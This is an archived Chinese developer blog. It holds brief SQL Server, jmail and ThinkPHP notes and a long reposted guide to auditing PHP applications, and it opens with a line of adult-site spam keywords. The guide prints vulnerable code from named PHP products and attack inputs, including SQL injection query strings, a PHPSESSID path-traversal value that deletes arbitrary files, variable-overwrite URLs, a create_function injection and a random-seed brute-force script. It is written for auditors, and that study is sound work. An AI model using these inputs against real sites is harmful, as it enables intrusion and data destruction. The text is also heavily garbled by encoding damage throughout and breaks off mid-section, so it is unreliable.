亚洲综合国产一区二区三区,亚洲av午夜精品一区二区三区,亚洲一区二区三区在线观看蜜桃

Fri, 05 Nov 2010 01:40:00 GMT

sql server中查询删除含有回车换行制表符的记�?收藏
--   制表�W?nbsp;            CHAR(9)
--   换行�W?nbsp;            CHAR(10)
--   回�R                 CHAR(13)
--在表aaa中过滤包含回车换行符的字�D�b的记�?
select * from aaa
where charindex(char(10)+char(13),b)>0
--在表aaa中把包含回�R换行�W�的字段b的记录的回�R换行�W�去�?br /> update aaa set b=replace(b,char(10)+char(13),'')

本文来自CSDN博客�Q��{载请标明出处�Q�http://blog.csdn.net/jiedushi/archive/2008/09/15/2933621.aspx

肖马�?/a> 2010-11-05 09:40 发表评论

Tue, 06 Jul 2010 12:49:00 GMT

jmail.POP3 popMail = new jmail.POP3();

            jmail.Message mailMessage;
            jmail.Attachments atts;
            jmail.Attachment att;
            string pop = "mail.xx.com";
            popMail.Connect("xx@xx.com", "xxxx", pop, 110);
            for (int i = 1; i <= popMail.Count; i++)
            {
                mailMessage = popMail.Messages[i];
                atts = mailMessage.Attachments;
                mailMessage.Charset = "gb2312";
                mailMessage.ContentTransferEncoding = "base64";
                mailMessage.Encoding = "base64";
                mailMessage.ISOEncodeHeaders = false;
                MessageBox.Show(mailMessage.Subject);
            }

popMail.Disconnect();

肖马�?/a> 2010-07-06 20:49 发表评论

ThinkPHP Cookie操作

Tue, 06 Jul 2010 07:11:00 GMT

Cookie�c�d��装了基本的Cookie静态操作方法，�q�且无需引入和实例化��可以直接��用�?br /> 和Cookie相关的设�|�参数有
'COOKIE_EXPIRE'=>30000000000, // Cookie有效�?/p>

'COOKIE_DOMAIN'=>$_SERVER['HTTP_HOST'], // Cookie有效域名

'COOKIE_PATH'=>'/', // Cookie路径

'COOKIE_PREFIX'=>'THINK_', // Cookie前缀避免冲突
复制代码
[ �Ҏ�� ]
常用的操作方法：
is_set($name) // ��Cookie变量是否存在
set($name,$value,$expire='',$path='',$domain='') // 讄��Cookie�?br /> Set�Ҏ��q�支持三个可选参�?
$expire 有效�?
$path Cookie路径
$domain Cookie域名
如果没有讄��则��用配�|�文仉��面的相关配置的倹{�?br /> get($name) // 获取Cookie�?br /> delete($name) // 删除Cookie的�?br /> clear($name) // 清空Cookie

[ �C�Z�� ]
下面�l�出了Cookie的相��x��作例子：
// ��Cookie变量是否存在

Cookie::is_set('userId');

// 讄��Cookie�?/p>

Cookie::set('userId','2008');

// 讄��Cookie 有效�?4��时

Cookie::set('userId','2008',60*60*24);

// 获取Cookie�?/p>

Cookie::get('userId');

// 删除Cookie�?/p>

Cookie::delete('userId');
复制代码
注意默认的配�|�参数COOKIE_PREFIX的值是'THINK_', 所以，如果需要通过传统方式调用Cookie值的话，应该�?br /> Cookie::get('userId')应该�{�同�?br /> $_COOKIE['THINK_userId']

肖马�?/a> 2010-07-06 15:11 发表评论

Mon, 28 Jun 2010 10:14:00 GMT

[目录]

1. 前言
2. 传统的代码审计技�?br /> 3. PHP版本与应用代码审�?br /> 4. 其他的因素与应用代码审计
5. 扩展我们的字�?br /> 5.1 变量本��n的key
5.2 变量覆盖
    5.2.1 遍历初始化变�?br />     5.2.2 parse_str()变量覆盖漏洞
    5.2.3 import_request_variables()变量覆盖漏洞
    5.2.4 PHP5 Globals
5.3 magic_quotes_gpc与代码安�?br />     5.3.1 什么是magic_quotes_gpc
    5.3.2 哪些地方没有��术引号的保�?br />     5.3.3 变量的编码与解码
    5.3.4 二次��d��
    5.3.5 ��术引号带来的新的安全问�?br />     5.3.6 变量key与魔术引�?br /> 5.4 代码注射
    5.4.1 PHP中可能导致代码注��的函数
    5.4.2 变量函数与双引号
5.5 PHP自��n函数漏洞及缺�?br />     5.5.1 PHP函数的溢出漏�z?br />     5.5.2 PHP函数的其他漏�z?br />     5.5.3 session_destroy()删除文�g漏洞
    5.5.4 随机函数
5.6 �Ҏ��字符
    5.6.1 截断
      5.6.1.1 include截断
      5.6.1.2 数据截断
      5.6.1.3 文�g操作里的�Ҏ��字符
6. 怎么�q�一步寻找新的字�?br /> 7. DEMO
8. 后话
9. 附录

一、前�a�

PHP是一�U�被�q�泛使用的脚本语�a��Q�尤光��合于web开发。具有跨�q�_��Q�容易学习，功能�?br /> 大等特点�Q�据�l�计全世界有��过34%的网站有php的应用，包括Yahoo、sina�?63、sohu�{�大�?br /> 门户�|�站。而且很多具名的web应用�pȝ��Q�包括bbs,blog,wiki,cms�{�等�Q�都是��用php开发的�Q?br /> Discuz、phpwind、phpbb、vbb、wordpress、boblog�{�等。随着web安全的热点升�U�，php�?br /> 用程序的代码安全问题也逐步兴盛��h��Q�越来越多的安全人员投入到这个领域，��来��多的应
用程序代码漏�z�被披露。针对这样一个状况，很多应用�E�序的官斚w��成立了安全部门，或者雇
佣安全�h员进行代码审计，因此出现了很多自动化商业化的代码审计工具。也��是�q�样的�Ş
势导致了一个局面：大公司的产品安全�p�L��大大的提高，那些很明昄��漏洞基本灭绝了，那些
大家都知道的审计技术都无用武之��C��。我们面对很多工具以及大牛扫描过n遍的代码�Q�有�?br /> 多的安全人员有点悲观�Q�而有的官方安全�h员也非常的放心自��q��代码�Q�但是不要忘��C��“�?br /> 有绝对的安全”�Q�我们应该去��L��新的途径挖掘新的漏洞。本文就�l�介�l�了一些非传统的技�?br /> �l�验和大家分享�?/p>

另外在这里特别说明一下本文里面很多漏�z�都是来源于�|�络上牛人和朋友们的分��n�Q�在
�q�里需要感谢他们，�Q�）

二、传�l�的代码审计技�?/p>

WEB应用�E�序漏洞查找基本上是围绕两个元素展开�Q�变量与函数。也��是说一漏洞的利�?br /> 必须把你提交的恶意代码通过变量�l�过n�ơ变量�{换传递，最�l�传递给目标函数执行�Q�还记得
MS那句�l�典的名�a�吗？“一切输入都是有害的”。这句话只强调了变量输入�Q�很多程序员�?#8220;�?br /> �?#8221;理解为只是gpc[$_GET,$_POST,$_COOKIE]�Q�但是变量在传递过�E��生了n多的变化。导�?br /> 很多�q��o只是�?#8220;�U�老虎”�Q�我们换句话来描叙下代码安全�Q?#8220;一切进入函数的变量是有害的”�?/p>

PHP代码审计技术用的最多也是目前的��d��Ҏ��Q�静态分析，主要也是通过查找�Ҏ��D��
安全漏洞的危险函敎ͼ�常用的如grep�Q�findstr�{�搜索工��P��很多自动化工具也是��用正则来�?br /> 索这些函数。下面列举一些常用的函数�Q�也��是下文说的字典�Q�暂略）。但是目前基本已有的
字典很难扑ֈ�漏洞�Q�所以我们需要扩展我们的字典�Q�这些字�怹�是本文主要探讨的�?/p>

其他的方法有�Q�通过修改PHP源代码来分析变量��程�Q�或者hook危险的函数来实现对应�?br /> �E�序代码的审核，但是�q�些也依靠了我们上面提到的字典�?/p>

三、PHP版本与应用代码审�?/p>

到目前�ؓ止，PHP主要�?个版本：php4、php5、php6�Q��用比例大致如下：

php4 68%
2000-2007�Q�No security fixes after 2008/08�Q�最�l�版本是php4.4.9

php5 32%
2004-present�Q�Now at version 5.2.6�Q�PHP 5.3 alpha1 released!�Q?/p>

php6
目前�q�在��试阶段�Q�变化很多做了大量的修改�Q�取消了很多安全选项如magic_quotes_gpc�?br /> �Q�这个不是今天讨论的范围�Q?/p>

�׃��php�~�少自动升��的机�Ӟ��D��目前PHP版本�q�存�Q�也��D��很多存在漏洞没有被修补�?br /> �q�些有漏�z�的函数也是我们�q�行WEB应用�E�序代码审计的重点对象，也是我们字典重要来源�?/p>

四、其他的因素与应用代码审�?/p>

很多代码审计者拿��C��码就看，他们忽视�?#8220;安全是一个整�?#8221;�Q�代码安全很多的其他因素
有关�p�，比如上面我们谈到的PHP版本的问题，比较重要的还有操作系�l�类型（主要是两大阵�?br /> win/*nix�Q�，WEB服务端��Y�Ӟ��主要是iis/apache两大�c�d��Q�等因素。这是由于不同的�pȝ��不同
的WEB SERVER有着不同的安全特�Ҏ��Ҏ��，下文有些部分会涉及�?/p>

所以我们在做某个公司WEB应用代码审计�Ӟ��应该了解他们使用的系�l�，WEB服务端��Y�Ӟ��
PHP版本�{�信息�?/p>

五、扩展我们的字典

下面��详�l�介�l�一些非传统PHP应用代码审计一些漏�z�类型和利用技巧�?/p>

5.1 变量本��n的key

说到变量的提交很多�h只是看到了GET/POST/COOKIE�{�提交的变量的��|��但是忘记了有�?br /> �E�序把变量本�w�的key也当变量提取�l�函数处理�?/p>

--code-------------------------------------------------------------------------
//key.php?aaaa'aaa=1&bb'b=2
//print_R($_GET);
foreach ($_GET AS $key => $value)
{
print $key."\n";
}
?>
-------------------------------------------------------------------------------

上面的代码就提取了变量本�w�的key昄��出来�Q�单�U�对于上面的代码�Q�如果我们提交URL�Q?/p>

--code-------------------------------------------------------------------------
key.php?=1&bbb=2
-------------------------------------------------------------------------------

那么��导致一个xss的漏�z�，扩展一下如果这个key提交�l�include()�{�函数或者sql查询
呢？�Q�）

+++++++++++++++++++++++++
漏洞审计�{�略
-------------------------
PHP版本要求�Q�无
�pȝ��要求�Q�无
审计�{�略�Q�通读代码
+++++++++++++++++++++++++

5.2 变量覆盖�Q�variable-overwrite�Q?/p>

很多的漏�z�查找者都知道extract()�q�个函数在指定参��CؓEXTR_OVERWRITE或者没有指
定函数可以导致变量覆盖，但是�q�有很多其他情况��D��变量覆盖的如�Q?/p>

5.2.1 遍历初始化变�?/p>

��L��如下代码�Q?/p>

--code-------------------------------------------------------------------------
//var.php?a=fuck
$a='hi';
foreach($_GET as $key => $value) {
$$key = $value;
}
print $a;
?>
-------------------------------------------------------------------------------

很多的WEB应用都��用上面的方式�Q�注意��@环不一定是foreach�Q�，如Discuz!4.1的WAP部分
的代码：

--code-------------------------------------------------------------------------
$chs = '';
if($_POST && $charset != 'utf-8') {
$chs = new Chinese('UTF-8', $charset);
foreach($_POST as $key => $value) {
$$key = $chs->Convert($value);
}
unset($chs);
-------------------------------------------------------------------------------

+++++++++++++++++++++++++
漏洞审计�{�略
-------------------------
PHP版本要求�Q�无
�pȝ��要求�Q�无
审计�{�略�Q�通读代码
+++++++++++++++++++++++++

5.2.2 parse_str()变量覆盖漏洞�Q�CVE-2007-3205�Q�、mb_parse_str()

--code-------------------------------------------------------------------------
//var.php?var=new
$var = 'init';
parse_str($_SERVER['QUERY_STRING']);
print $var;
-------------------------------------------------------------------------------

该函��C��样可以覆盖数�l�变量，上面的代码是通过$_SERVER['QUERY_STRING']来提取变
量的�Q�对于指定了变量名的我们可以通过注射“=”来实现覆盖其他的变量�Q?/p>

--code-------------------------------------------------------------------------
//var.php?var=1&a[1]=var1%3d222
$var1 = 'init';
parse_str($a[$_GET['var']]);
print $var1;
-------------------------------------------------------------------------------

上面的代码通过提交$var来实现对$var1的覆盖�?/p>

+++++++++++++++++++++++++
漏洞审计�{�略�Q�parse_str�Q?br /> -------------------------
PHP版本要求�Q�无
�pȝ��要求�Q�无
审计�{�略�Q�查扑֭��W�parse_str
+++++++++++++++++++++++++

+++++++++++++++++++++++++
漏洞审计�{�略�Q�mb_parse_str�Q?br /> -------------------------
PHP版本要求�Q�php4<4.4.7 php5<5.2.2
�pȝ��要求�Q�无
审计�{�略�Q�查扑֭��W�mb_parse_str
+++++++++++++++++++++++++

5.2.3 import_request_variables()变量覆盖漏洞�Q�CVE-2007-1396�Q?/p>

--code-------------------------------------------------------------------------
//var.php?_SERVER[REMOTE_ADDR]=10.1.1.1
echo 'GLOBALS '.(int)ini_get("register_globals")."n";
import_request_variables('GPC');
if ($_SERVER['REMOTE_ADDR'] != '10.1.1.1') die('Go away!');
echo 'Hello admin!';
-------------------------------------------------------------------------------

+++++++++++++++++++++++++
漏洞审计�{�略�Q�import_request_variables�Q?br /> -------------------------
PHP版本要求�Q�php4<4.4.1 php5<5.2.2
�pȝ��要求�Q�无
审计�{�略�Q�查扑֭��W�import_request_variables
+++++++++++++++++++++++++

5.2.4 PHP5 Globals

从严格意义上来说�q�个不可以算是PHP的漏�z�，只能��是一个特性，��试代码�Q?/p>

--code-------------------------------------------------------------------------
// register_globals =ON
//foo.php?GLOBALS[foobar]=HELLO
php echo $foobar;
?>
-------------------------------------------------------------------------------

但是很多的程序没有考虑到这点，��L��如下代码�Q?/p>

--code-------------------------------------------------------------------------
//��Z��安全取消全局变量
//var.php?GLOBALS[a]=aaaa&b=111
if (ini_get('register_globals')) foreach($_REQUEST as $k=>$v) unset(${$k});
print $a;
print $_GET[b];
-------------------------------------------------------------------------------

如果熟悉WEB2.0的攻�ȝ��同学�Q�很�Ҏ��惛_��上面的代码我们可以利用这个特性进行crsf
��d��?/p>

+++++++++++++++++++++++++
漏洞审计�{�略
-------------------------
PHP版本要求�Q�无
�pȝ��要求�Q�无
审计�{�略�Q�通读代码
+++++++++++++++++++++++++

5.3 magic_quotes_gpc与代码安�?/p>

5.3.1 什么是magic_quotes_gpc

当打开�Ӟ��所有的 '�Q�单引号�Q�，"�Q�双引号�Q�，\�Q�反斜线�Q�和 NULL 字符都会被自动加上一�?br /> 反斜�U�进行�{义。还有很多函数有�c�M��的作�?如：addslashes()、mysql_escape_string()�?br /> mysql_real_escape_string()�{�，另外�q�有parse_str()后的变量也受magic_quotes_gpc的媄
响。目前大多数的主机都打开了这个选项�Q��ƈ且很多程序员也注意��用上面那些函数去�q��o
变量�Q�这看上��d��安全。很多漏�z�查找者或者工具遇��C��函数�q��o后的变量直接��放弃，但是
��在他们攑ּ�的同时也放过很多致命的安全漏�z��?�Q�）

5.3.2 哪些地方没有��术引号的保�?br />
1) $_SERVER变量

PHP5�?_SERVER变量�~�少magic_quotes_gpc的保护，��D��q�年来X-Forwarded-For的漏�z?br /> 猛暴�Q�所以很多程序员考虑�q��oX-Forwarded-For�Q�但是其他的变量呢？

+++++++++++++++++++++++++
漏洞审计�{�略�Q?_SERVER变量�Q?br /> -------------------------
PHP版本要求�Q�无
�pȝ��要求�Q�无
审计�{�略�Q�查扑֭��W�_SERVER
+++++++++++++++++++++++++

2) getenv()得到的变量（使用�c�M��$_SERVER变量�Q?br />
+++++++++++++++++++++++++
漏洞审计�{�略�Q�getenv()�Q?br /> -------------------------
PHP版本要求�Q�无
�pȝ��要求�Q�无
审计�{�略�Q�查扑֭��W�getenv
+++++++++++++++++++++++++

3) $HTTP_RAW_POST_DATA与PHP输入、输出流

主要应用与soap/xmlrpc/webpublish功能里，��L��如下代码�Q?/p>

--code-------------------------------------------------------------------------
if ( !isset( $HTTP_RAW_POST_DATA ) ) {
$HTTP_RAW_POST_DATA = file_get_contents( 'php://input' );
}
if ( isset($HTTP_RAW_POST_DATA) )
$HTTP_RAW_POST_DATA = trim($HTTP_RAW_POST_DATA);
-------------------------------------------------------------------------------

+++++++++++++++++++++++++
漏洞审计�{�略�Q�数据流�Q?br /> -------------------------
PHP版本要求�Q�无
�pȝ��要求�Q�无
审计�{�略�Q�查扑֭��W�HTTP_RAW_POST_DATA或者php://input
+++++++++++++++++++++++++

4) 数据库操作容易忘�?的地方如�Q�in()/limit/order by/group by

如Discuz!<5.0的pm.php�Q?br />
--code-------------------------------------------------------------------------
if(is_array($msgtobuddys)) {
$msgto = array_merge($msgtobuddys, array($msgtoid));
......
foreach($msgto as $uid) {
$uids .= $comma.$uid;
$comma = ',';
}
......
$query = $db->query("SELECT m.username, mf.ignorepm FROM {$tablepre}members m
LEFT JOIN {$tablepre}memberfields mf USING(uid)
WHERE m.uid IN ($uids)");
-------------------------------------------------------------------------------

+++++++++++++++++++++++++
漏洞审计�{�略
-------------------------
PHP版本要求�Q�无
�pȝ��要求�Q�无
审计�{�略�Q�查找数据库操作字符�Q�select,update,insert�{�等�Q?br /> +++++++++++++++++++++++++

5.3.3 变量的编码与解码

一个WEB�E�序很多功能的实现都需要变量的�~�码解码�Q�而且��在�q�一转一解的传递过�E�中
��悄悄的�l�过你的�q��o的安全防�Uѝ�?/p>

�q�个�c�d��的主要函数有�Q?/p>

1) stripslashes() �q�个其实��是一个decode-addslashes()

2) 其他字符串�{换函敎ͼ�

base64_decode -- 对��?MIME base64 �~�码的数据进行解�?br /> base64_encode -- 使用 MIME base64 �Ҏ��据进行编�?br /> rawurldecode -- 对已�~�码�?URL 字符串进行解�?br /> rawurlencode -- 按照 RFC 1738 �?URL �q�行�~�码
urldecode -- 解码已编码的 URL 字符�?br /> urlencode -- �~�码 URL 字符�?br /> ......
�Q�另外一�?unserialize/serialize�Q?/p>

3) 字符集函敎ͼ�GKB,UTF7/8...�Q�如iconv()/mb_convert_encoding()�{?br />
目前很多漏洞挖掘者开始注意这一�c�d��的漏�z�了�Q�如典型的urldecode�Q?/p>

--code-------------------------------------------------------------------------
$sql = "SELECT * FROM article WHERE articleid='".urldecode($_GET[id])."'";
-------------------------------------------------------------------------------

当magic_quotes_gpc=on�Ӟ��我们提交?id=%2527�Q�得到sql语句为：

--code-------------------------------------------------------------------------
SELECT * FROM article WHERE articleid='''
-------------------------------------------------------------------------------

+++++++++++++++++++++++++
漏洞审计�{�略
-------------------------
PHP版本要求�Q�无
�pȝ��要求�Q�无
审计�{�略�Q�查扑֯�应的�~�码函数
+++++++++++++++++++++++++

5.3.4 二次��d��Q�详�l�见附录[1]�Q?/p>

1) 数据库出来的变量没有�q�行�q��o

2) 数据库的转义�W�号�Q?/p>

* mysql/oracle转义�W�号同样是\�Q�我们提�?通过��术引号变化为\'�Q�当我们update�q�入�?br /> 据库�Ӟ��通过转义变�ؓ'�Q?/p>

* mssql的�{义字�W��ؓ'�Q�所以我们提�?通过��术引号变化为\'�Q�mssql会把它当��Z��个字�W?br /> 串直接处理，所以魔术引号对于mssql的注��没有�Q何意义）

从这里我们可以思考得��C��个结论：一切进入函数的变量都是有害的，另外利用二次��d��
我们可以实现一个webrootkit�Q�把我们的恶意构造直接放到数据库里。我们应当把�q�样的代
码看成一个vul�Q?/p>

+++++++++++++++++++++++++
漏洞审计�{�略
-------------------------
PHP版本要求�Q�无
�pȝ��要求�Q�无
审计�{�略�Q�通读代码
+++++++++++++++++++++++++

5.3.5 ��术引号带来的新的安全问�?/p>

首先我们看下��术引号的处理机�Ӟ��

[\-->\\,'-->\',"-->\",null-->\0]

�q�给我们引进了一个非常有用的�W�号“\”�Q?#8220;\”�W�号不仅仅是转义�W�号�Q�在WIN�pȝ��下也�?br /> 目录转蟩的符受��这个特点可能导致php应用�E�序里��生非常有意思的漏洞�Q?/p>

1) 得到原字�W�（',\,",null]�Q?/p>

--code-------------------------------------------------------------------------
$order_sn=substr($_GET['order_sn'], 1);

//提交                 '
//��术引号处理         \'
//substr               '

$sql = "SELECT order_id, order_status, shipping_status, pay_status, ".
   " shipping_time, shipping_id, invoice_no, user_id ".
   " FROM " . $ecs->table('order_info').
   " WHERE order_sn = '$order_sn' LIMIT 1";
-------------------------------------------------------------------------------

2) 得到“\”字符

--code-------------------------------------------------------------------------
$order_sn=substr($_GET['order_sn'], 0,1);

//提交                 '
//��术引号处理         \'
//substr               \

$sql = "SELECT order_id, order_status, shipping_status, pay_status, ".
   " shipping_time, shipping_id, invoice_no, user_id ".
   " FROM " . $ecs->table('order_info').
   " WHERE order_sn = '$order_sn' and order_tn='".$_GET['order_tn']."'";
-------------------------------------------------------------------------------

    提交内容�Q?/p>

--code-------------------------------------------------------------------------
?order_sn='&order_tn=%20and%201=1/*
-------------------------------------------------------------------------------

执行的SQL语句为：

--code-------------------------------------------------------------------------
SELECT order_id, order_status, shipping_status, pay_status, shipping_time,
shipping_id, invoice_no, user_id FROM order_info WHERE order_sn = '\' and
order_tn=' and 1=1/*'
-------------------------------------------------------------------------------

+++++++++++++++++++++++++
漏洞审计�{�略
-------------------------
PHP版本要求�Q�无
�pȝ��要求�Q�无
审计�{�略�Q�查扑֭��W�串处理函数如substr或者通读代码
+++++++++++++++++++++++++

5.3.6 变量key与魔术引�?br />
我们最在这一节的开头就提到了变量key�Q�PHP的魔术引号对它有什么媄响呢�Q?/p>

--code-------------------------------------------------------------------------
//key.php?aaaa'aaa=1&bb'b=2
//print_R($_GET);
foreach ($_GET AS $key => $value)
        {
        print $key."\n";
        }
?>
-------------------------------------------------------------------------------

1) 当magic_quotes_gpc = On�Ӟ��在php5.24下测试显�C�：

aaaa\'aaa
bb\'b

从上面结果可以看出来�Q�在讄��了magic_quotes_gpc = On下，变量key受魔术引号媄响�?br /> 但是在php4和php<5.2.1的版本中�Q�不处理数组�W�一�l�变量的key�Q�测试代码如下：

--code-------------------------------------------------------------------------
//key.php?aaaa'aaa[bb']=1
print_R($_GET);
?>
-------------------------------------------------------------------------------

�l�果昄��:

Array ( [aaaa'aaa] => Array ( [bb\'] => 1 ) )

数组�W�一�l�变量的key不受��术引号的媄响�?/p>

+++++++++++++++++++++++++
漏洞审计�{�略
-------------------------
PHP版本要求�Q�php4和php<5.2.1
�pȝ��要求�Q�无
审计�{�略�Q�通读代码
+++++++++++++++++++++++++

2) 当magic_quotes_gpc = Off�Ӟ��在php5.24下测试显�C�：

aaaa'aaa
bb'b

对于magic_quotes_gpc = Off时所有的变量都是不安全的�Q�考虑到这个，很多�E�序都通过
addslashes�{�函数来实现��术引号对变量的�q��o�Q�示例代码如下：

--code-------------------------------------------------------------------------
//keyvul.php?aaa'aa=1'
//magic_quotes_gpc = Off
if (!get_magic_quotes_gpc())
{
$_GET = addslashes_array($_GET);
}

function addslashes_array($value)
{
return is_array($value) ? array_map('addslashes_array', $value) : addslashes($value);
}
print_R($_GET);
foreach ($_GET AS $key => $value)
{
print $key;
}
?>
-------------------------------------------------------------------------------

以上的代码看上去很完��，但是他这个代码里addslashes($value)只处理了变量的具�?br /> 的��|��但是没有处理变量本��n的key�Q�上面的代码昄��l�果如下�Q?br />
Array
(
[aaa'aa] => 1\'
)
aaa'aa

+++++++++++++++++++++++++
漏洞审计�{�略
-------------------------
PHP版本要求�Q�无
�pȝ��要求�Q�无
审计�{�略�Q�通读代码
+++++++++++++++++++++++++

5.4 代码注射

5.4.1 PHP中可能导致代码注��的函数

很多人都知道eval、preg_replace+/e可以执行代码�Q�但是不知道php�q�有很多的函数可
以执行代码如�Q?/p>

assert()
call_user_func()
call_user_func_array()
create_function()
变量函数
...

�q�里我们看看最�q�出现的几个关于create_function()代码执行漏洞的代码：

--code-------------------------------------------------------------------------
//how to exp this code
$sort_by=$_GET['sort_by'];
$sorter='strnatcasecmp';
$databases=array('test','test');
$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);
';
usort($databases, create_function('$a, $b', $sort_function));
-------------------------------------------------------------------------------

+++++++++++++++++++++++++
漏洞审计�{�略
-------------------------
PHP版本要求�Q�无
�pȝ��要求�Q�无
审计�{�略�Q�查扑֯�应函敎ͼ�assert,call_user_func,call_user_func_array,create_function�{�）
+++++++++++++++++++++++++

5.4.2 变量函数与双引号

对于单引号和双引��L��区别�Q�很多程序员深有体会�Q�示例代码：

--code-------------------------------------------------------------------------
echo "$a\n";
echo '$a\n';
-------------------------------------------------------------------------------

我们再看如下代码�Q?/p>

--code-------------------------------------------------------------------------
//how to exp this code
if($globals['bbc_email']){

$text = preg_replace(
array("/\[email=(.*?)\](.*?)\[\/email\]/ies",
"/\[email\](.*?)\[\/email\]/ies"),
array('check_email("$1", "$2")',
'check_email("$1", "$1")'), $text);
-------------------------------------------------------------------------------

另外很多的应用程序都把变量用""存放在缓存文件或者config或者data文�g里，�q�样�?br /> �Ҏ��被�h注射变量函数�?br />
+++++++++++++++++++++++++
漏洞审计�{�略
-------------------------
PHP版本要求�Q�无
�pȝ��要求�Q�无
审计�{�略�Q�通读代码
+++++++++++++++++++++++++

5.5 PHP自��n函数漏洞及缺�?br />
5.5.1 PHP函数的溢出漏�z?/p>

大家�q�记得Stefan Esser大牛的Month of PHP Bugs�Q�MOPB见附录[2]�Q�项目么�Q�其中比�?br /> 有名的要��是unserialize()�Q�代码如下：

--code-------------------------------------------------------------------------
unserialize(stripslashes($HTTP_COOKIE_VARS[$cookiename . '_data']);
-------------------------------------------------------------------------------

在以往的PHP版本里，很多函数都曾�l�出现过溢出漏洞�Q�所以我们在审计应用�E�序漏洞�?br /> 时候不要忘��C��试目标使用的PHP版本信息�?/p>

+++++++++++++++++++++++++
漏洞审计�{�略
-------------------------
PHP版本要求�Q�对应fix的版�?br /> �pȝ��要求�Q?br /> 审计�{�略�Q�查扑֯�应函数名
+++++++++++++++++++++++++

5.5.2 PHP函数的其他漏�z?/p>

    Stefan Esser大牛发现的漏�z�：unset()--Zend_Hash_Del_Key_Or_Index Vulnerability

    比如phpwind早期的serarch.php里的代码�Q?/p>

--code-------------------------------------------------------------------------
unset($uids);
......
$query=$db->query("SELECT uid FROM pw_members WHERE username LIKE '$pwuser'");
while($member=$db->fetch_array($query)){
$uids .= $member['uid'].',';
}
$uids ? $uids=substr($uids,0,-1) : $sqlwhere.=' AND 0 ';
........
$query = $db->query("SELECT DISTINCT t.tid FROM $sqltable WHERE $sqlwhere $orderby $limit");
-------------------------------------------------------------------------------

+++++++++++++++++++++++++
漏洞审计�{�略
-------------------------
PHP版本要求�Q�php4<4.3 php5<5.14
�pȝ��要求�Q�无
审计�{�略�Q�查找unset
+++++++++++++++++++++++++

5.5.3 session_destroy()删除文�g漏洞�Q�测试PHP版本�Q?.1.2�Q?br />
�q�个漏洞是几�q�前朋友saiy发现的，session_destroy()函数的功能是删除session文�g�Q?br /> 很多web应用�E�序的logout的功能都直接调用�q�个函数删除session�Q�但是这个函数在一些�?br /> 的版本中�~�少�q��o��D��可以删除��L��文�g。测试代码如下：

--code-------------------------------------------------------------------------
//val.php
session_save_path('./');
session_start();
if($_GET['del']) {
session_unset();
session_destroy();
}else{
$_SESSION['hei']=1;
echo(session_id());
print_r($_SESSION);
}
?>
-------------------------------------------------------------------------------

当我们提交构造cookie:PHPSESSID=/../1.php�Q�相当于unlink('sess_/../1.php')�q�样
��通过注射../转蟩目录删除��L��文�g了。很多著名的�E�序某些版本都受影响如phpmyadmin�Q?br /> sablog�Q�phpwind3�{�等�?/p>

+++++++++++++++++++++++++
漏洞审计�{�略
-------------------------
PHP版本要求�Q�具体不�?br /> �pȝ��要求�Q�无
审计�{�略�Q�查找session_destroy
+++++++++++++++++++++++++

5.5.4 随机函数

1) rand() VS mt_rand()

--code-------------------------------------------------------------------------
//on windows
print mt_getrandmax(); //2147483647
print getrandmax();// 32767
?>
-------------------------------------------------------------------------------

可以看出rand()最大的随机数是32767�Q�这个很�Ҏ��被我们暴力破解�?

--code-------------------------------------------------------------------------
$a= md5(rand());
for($i=0;$i<=32767;$i++){
if(md5($i) ==$a ) {
print $i."-->ok!!
";exit;
}else { print $i."
";}
}
?>
-------------------------------------------------------------------------------

当我们的�E�序使用rand处理session�Ӟ��d��者很�Ҏ��暴力破解��Z��的session�Q�但是对�?br /> mt_rand是很隑֍��U�的暴力的�?/p>

+++++++++++++++++++++++++
漏洞审计�{�略
-------------------------
PHP版本要求�Q�无
�pȝ��要求�Q�无
审计�{�略�Q�查找rand
+++++++++++++++++++++++++

2) mt_srand()/srand()-weak seeding�Q�by Stefan Esser�Q?br />
看php手册里的描述�Q?/p>

-------------------------------------------------------------------------------
mt_srand
(PHP 3 >= 3.0.6, PHP 4, PHP 5)

mt_srand -- 播下一个更好的随机数发生器�U�子
说明
void mt_srand ( int seed )

�?seed 来给随机数发生器播种。从 PHP 4.2.0 版开始，seed 参数变�ؓ可选项�Q�当该项为空
�Ӟ��会被设�ؓ随时数�?

例子 1. mt_srand() 范例

// seed with microseconds
function make_seed()
{
list($usec, $sec) = explode(' ', microtime());
return (float) $sec + ((float) $usec * 100000);
}
mt_srand(make_seed());
$randval = mt_rand();
?>

�? �?PHP 4.2.0 ��P��不再需要用 srand() �?mt_srand() 函数�l�随机数发生器播�U�，现已
自动完成�?br /> -------------------------------------------------------------------------------

php�?.2.0开始实��C��自动播种�Q�但是�ؓ了兼容，后来使用�c�M��于这��L��代码播种�Q?/p>

--code-------------------------------------------------------------------------
mt_srand ((double) microtime() * 1000000)
-------------------------------------------------------------------------------

但是使用(double)microtime()*1000000�c�M��的代码seed是比较脆��q��Q?/p>

0<(double) microtime()<1 ---> 0<(double) microtime()* 1000000<1000000

那么很容易暴力破�?��试代码如下�Q?/p>

--code-------------------------------------------------------------------------
/////////////////
//>php rand.php
//828682
//828682
////////////////
ini_set("max_execution_time",0);
$time=(double) microtime()* 1000000;
print $time."\n";
mt_srand ($time);

$search_id = mt_rand();
$seed = search_seed($search_id);
print $seed;
function search_seed($rand_num) {
$max = 1000000;
for($seed=0;$seed<=$max;$seed++){
mt_srand($seed);
$key = mt_rand();
if($key==$rand_num) return $seed;
}
return false;
}
?>
-------------------------------------------------------------------------------

从上面的代码实现了对seed的破解，另外�Ҏ��Stefan Esser的分析seed�q�根据进�E�变�?br /> 而变化，换句话来说同一个进�E�里的seed是相同的�?然后同一个seed每次mt_rand的值都�?br /> 特定的。如下图�Q?/p>

+--------------+
| seed-A |
+--------------+
| mt_rand-A-1 |
| mt_rand-A-2 |
| mt_rand-A-3 |
+--------------+

+--------------+
| seed-B |
+--------------+
| mt_rand-B-1 |
| mt_rand-B-2 |
| mt_rand-B-3 |
+--------------+

对于seed-A里mt_rand-1/2/3都是不相�{�的�Q�但是值都是特定的�Q�也��是说当seed-A�{�于
seed-B�Q�那么mt_rand-A-1��q��于mt_rand-B-1…�Q�这��h��们只要能够得到seed��可以得到每��?br /> mt_rand的��g��?/p>

对于5.2.6>php>4.2.0直接使用默认播种的程序也是不安全的（很多的安全�h员错误的�?br /> ��样就是安全的�Q�，�q�个要分两种情况来分析：

�W�一�U�：'Cross Application Attacks'�Q�这个思�\在Stefan Esser文章里有提到�Q�主要是利用
其他�E�序定义的播�U�（如mt_srand ((double) microtime()* 1000000)�Q�，phpbb+wordpree�l?br /> 合就存在�q�样的危�?

